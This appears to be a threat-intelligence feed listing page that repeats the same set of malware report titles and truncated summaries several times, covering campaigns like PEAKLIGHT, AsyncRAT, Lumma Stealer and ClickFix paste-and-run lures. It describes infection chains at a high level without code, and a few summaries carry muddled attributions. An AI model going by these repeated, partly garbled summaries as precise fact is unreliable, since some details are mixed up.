This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware Masquerading Oculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ransomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to those of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
